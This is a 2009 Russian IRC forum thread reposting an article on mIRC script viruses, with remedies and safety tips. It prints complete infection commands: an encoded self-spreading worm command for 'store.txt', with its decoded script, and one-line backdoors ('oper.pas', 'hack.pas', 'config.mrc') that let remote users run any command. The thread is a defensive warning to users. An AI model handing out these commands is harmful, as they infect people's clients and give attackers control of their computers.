Главная | Регистрация | Вход Приветствую Вас Гость | RSS
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Вирусы, распространяющиеся с помощью mIRС.
Flu[Gerr]Дата: Вторник, 10.02.2009, 03:04 | Сообщение # 1
Майор
Группа: Модераторы
Сообщений: 24
Репутация: 2
Статус: Offline
Когда люди впервые попадают в Irc или же просто плохо разбираются в Irc, они могут стать жертвой злоумышленнников, распространяющих вредоносные вирусы через mIrc (а как известно именно mIRC является самым популярным клиентом для подключения к Irc сетям). Всвязи с этим предлагаю вашему вниманию эту небольшую,но весьма интересную статью, взятую мной с сайта http://filona.tomsk.ru/mirc-viruses.html .

Вирусы, распространяющиеся с помощью mIRC
Вступление

mIRC-вирусы стали довольно распространёнными благодаря большой популярности этого IRC-клиента. Нередко бывает, что неопытный пользователь заражается ими, даже не понимая, что произошло. В этой статье я делаю попытку рассмотреть наиболее распространённые вирусы и методы заражения ими в mIRC, а также принципы лечения и профилактики.

Итак, Вас вдруг выкинуло из "мирки" с причинами типа "(Virus/Trojan. Your IRC client is infected, please check it & stop infecting others.)))", "(You are banned, Ваш irc-клиент заражён вирусом, удалите его и установите новый.)", "(You are banned. Пожалуйста, избавьтесь от компьютерных вирусов.)", "(You are banned, Trojan runner. Check your system for viruses and reinstall your IRC client.)" или просто "(decode virus)". Все эти сообщения означают, что Вы (сознательно или нет) заразили свой mIRC вирусом. Чаще всего это происходит в результате ввода "странной" команды, которую Вас попросил ввести в привате знакомый (или незнакомый) человек либо открытия не менее странной ссылки, сопровождавшейся словами типа "Fotos XXX ...", "Aprende a conquistar al sexo opuesto ...", "Mira esta foto ..." и т. д. То есть вирус сулит вам порнографические картинки, а на самом деле просто таким путём размножается.

Иногда вирусы распространяются, рассылая свои копии по DCC. При этом у некоторых версий mIRC (и его клонов) присланные файлы располагались в каталоге самого клиента и могли замещать дефолтный файл script.ini, таким образом при следующем старте mIRC'а он оказывается зараженным. Несмотря на то, что именно эта "дыра" в настоящее время ликвидирована, вредоносные скрипты всё равно могут прописываться в автозагрузку клиента.
Наиболее распространённые вирусы и способы заражения ими
Простейшие скриптовые вирусы, не приносящие особого вреда

Один из самых старых и распространённых вирусов выглядит так: Вам в привате пишут что-нибудь вроде "Наши фотки. Не вирус! ..." или "Возможность #канал чтение приватов ..." и далее предлагается команда: //write store.txt $decode(b24gMTpqb2luOiM6IHsgLm1zZyAkbmljayDC7ufs7ubt7vHy/ CAjIPfy5e3o5SDv8Oji4PLu4iwg7eDk7iDv8O7v6PHg8vwgLy93cml0ZSBzdG9yZS50eHQgJCAkKyBkZ WNvZGUoICQrICRlbmNvZGUoICRyZWFkKCRzY3JpcHQsbiwxKSAsbSkgJCsgLG0pICRjaHIoMTI0KSAvL 3dyaXRlIHN0b3JlLnR4dCAkY2hyKDEyNCkgLmxvYWQgLXJzIHN0b3JlLnR4dCB8IC5pZ25vcmUgJG5pY 2sgfQ==,m) | //write store.txt | .load -rs store.txt
Если его расшифровать, то получается такой скрипт, который записывается в файл store.txt: on 1:join:#: { .msg $nick Возможность # чтение приватов, надо прописать //write store.txt $ $+ decode( $+ $encode( $read($script,n,1) ,m) $+ ,m) $chr(124) //write store.txt $chr(124) .load -rs store.txt | .ignore $nick }

То есть после заражения этим вирусом Ваш mIRC всем заходящим на канал отправляет в приват тот же текст, который получили Вы, с той же командой, после чего ставит игнор по нику (чтобы Вы не увидели возмущённых сообщений от этих пользователей, что Вы являетесь разносчиком вируса и как можно дольше могли распространять вирус).
Чтобы вылечиться Вам необходимо проделать следующее:
1)Выгрузить вирусный скрипт командой /unload -rs store.txt
2)Выключить и закрыть mIRC, открыть каталог, где mIRC установлен, найти файл "store.txt" и удалить его.
3)Запустить mIRC снова. Когда запустите, наберите alt+b и перейдите на вкладку Control, из выпадающего списка выберите Ignore и изучите внимательно список игнорирования. Если обнаружите там тех пользователей, на которых Вы игнор не ставили, удалите их из списка. Можно сделать быстрее — набрать команду /ignore -r — это очистит список игнорирования полностью. Тут стоит заметить, что файл с вирусом вовсе не обязательно может называться "store.txt", могут быть любые другие имена. Таким образом, не мешает заглянуть в лог того самого привата, команду из которого Вы некогда набрали, найти там название файла (проще всего глянуть, что стоит в самом конце после ".load -rs") и проделать вышеописанные действия, подставив вместо "store.txt" название того файла.



Только бог может судить меня...


Сообщение отредактировал Flu[Gerr] - Вторник, 10.02.2009, 03:09
 
Flu[Gerr]Дата: Вторник, 10.02.2009, 03:07 | Сообщение # 2
Майор
Группа: Модераторы
Сообщений: 24
Репутация: 2
Статус: Offline
Скриптовые вирусы, позволяющие удалённо управлять IRC-клиентом и компьютером заражённого пользователя

Ещё одним известным вредоносным скриптом является "oper.pas". Распространяется он сознательно пользователями, желающими причинить Вам вред. В этом случае Вам предлагают набрать команду //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas, обычно сопровождая это предложение "научить взламывать компьютеры" или ещё как-нибудь. Это может быть и знакомый Вам человек (даже, скорее всего, так и будет), которому Вы хоть немного доверяете. В результате ввода этой команды Вы создадите и загрузите файл "oper.pas", благодаря которому разрешите любому злоумышленнику запускать любые команды на Вашем компьютере через mIRC путём отправки специальных ctcp-запросов: /ctcp Ваш_ник команды. Если учесть, что из mIRC можно запускать внешние программы и эта возможность мало кем отключается, то помимо вреда, нанесённого Вам в IRC, злоумышленник может нанести вред Вашему компьютеру. Помимо "oper.pas", вредоносный скрипт могут назвать разными другими именами: "hack.pas", "config.mrc". Создаются они примерно таким же способом: Вам предлагают ввести команду //write hack.pas ctcp 1:*:?:$1- | Load -rs hack.pas или .//write config.mrc ctcp ^*:*:*:$1- | Load -rs config.mrc. Суть та же: создавая и загружая такой скрипт этими командами, Вы даёте полный контроль злоумышленнику над своим компьютером. Чтобы вылечиться нужно проделать простые действия:
1)Выгрузить скрипт командой /unload -rs имя_вредного_скрипта (oper.pas, hack.pas, config.mrc). Если Вам предлагали ввести команду с другим именем для скрипта (в этом случае Вам придётся обратиться к логам привата со злоумышленником), то подставьте его.
2)Найти по имени файл скрипта в каталоге, где установлен mIRC и удалить его.

Вирусы и трояны, использующие mIRC для распространения
Существует уже немалое количество вирусов, распространяющих себя по DCC. Заражённый mIRC отправляет всем входящим на канал файл с вирусом, обеспечивая, таким образом, своё распространение. Следовательно, чтобы не заразиться, выполняйте следующие простые правила безопасности:
Не принимайте непонятные файлы от любых пользователей IRC. Особенно если человек на вопрос "что это за файл?" не может дать Вам внятного ответа.
Отключите в Вашем mIRC автоматический приём файлов! Для этого откройте опции (alt+O), там найдите DCC, посмотрите в "On Send Request" ("Запрос на получение файла") и поставьте галочку в "Show get dialog" ("Показывать диалог получения файлов") либо "Ignore all" ("Игнорировать все"). Не ставьте галочку в "Auto-get file" ("Автоматически получать файлы")!
Другие вирусы распространяются ссылками, отправляемыми в приват. Чаще всего предлагается видео или фото порнографического содержания и даётся ссылка, при открытии которой в браузере происходит заражение компьютера. Соответственно, чтобы не заразиться, не открывайте непонятные ссылки, особенно связанные с порнографией — в этом случае Вы заразитесь почти со 100%ной вероятностью.
Некоторые вирусы, так же как рассмотренный выше скрипт "store.txt", не делают ничего особенного, кроме распространения самих себя и более ничем не опасны. Но многие другие используют mIRC только для размножения, а вредоносную активность проявляют в другом: например, заражают документы MS Word (IRC-Worm.MSWord.Anumps), EXE-файлы Windows (IRC-Worm.Win32.Adrenaline), могут уничтожить прошивку BIOS компьютера (IRC-Worm.DOS.Claw.2513), скачивают других червей или вирусы с более опасными функциями и т. д. С описаниями некоторых вирусов можно ознакомиться, например, на сайте www.viruslist.com.
Излечиться от подобных вирусов уже не так просто, как от скриптовых. Вам придётся воспользоваться антивирусом (любым удобным для Вас, главное, чтобы у него были свежие базы вирусов). В некоторых случаях может помочь удаление и полная переустановка mIRC, но необходимость проверки антивирусом это не отменяет.

Итак, вкратце ещё раз перечислю основные меры безопасности, которые надо соблюдать пользователям IRC, чтобы не заразиться вирусом:
1)Не набирать незнакомых команд.
2)Не открывать подозрительные ссылки.
3)Не принимать подозрительные файлы по DCC.
Если Вы заразились, а потом проделали всё необходимое для лечения от вируса, но всё же не можете соединиться с IRC, то Вам придётся подождать, пока снимется akill на Ваш адрес. Не переживайте, если Вы не нарушали других правил сети, то через некоторое время akill снимется автоматически (через несколько часов, максимум — несколько дней).

END.



Только бог может судить меня...
 
Flu[Gerr]Дата: Вторник, 10.02.2009, 03:08 | Сообщение # 3
Майор
Группа: Модераторы
Сообщений: 24
Репутация: 2
Статус: Offline
В дополнение хочу добавить: Никогда не прописывайте ничего из того, что вам предлагают если точно не уверены в том, что значит предлагаемая вам команда. Я видел немало случаев, когда пользователи по своей неопытности передавали злоумышленникам свой пароль от ника/канала, не осознавая что они делают. Если вы не увернены в том, что обозначает та или иная команда лучше обратитесь на существующий в любой сети канал #help, где вам всегда подскажут её значение.

Помните: конфиденциальность ваших паролей в Irc зависит прежде всего только от вас.



Только бог может судить меня...
 
SanekДата: Вторник, 10.02.2009, 14:48 | Сообщение # 4
Admin
Группа: Администраторы
Сообщений: 24
Репутация: 1
Статус: Offline
полезная статья и для новичков и для опытных чатеров smile
 
  • Страница 1 из 1
  • 1
Поиск:


Copyright by BestIRC.uCoz.Net © 2008-2009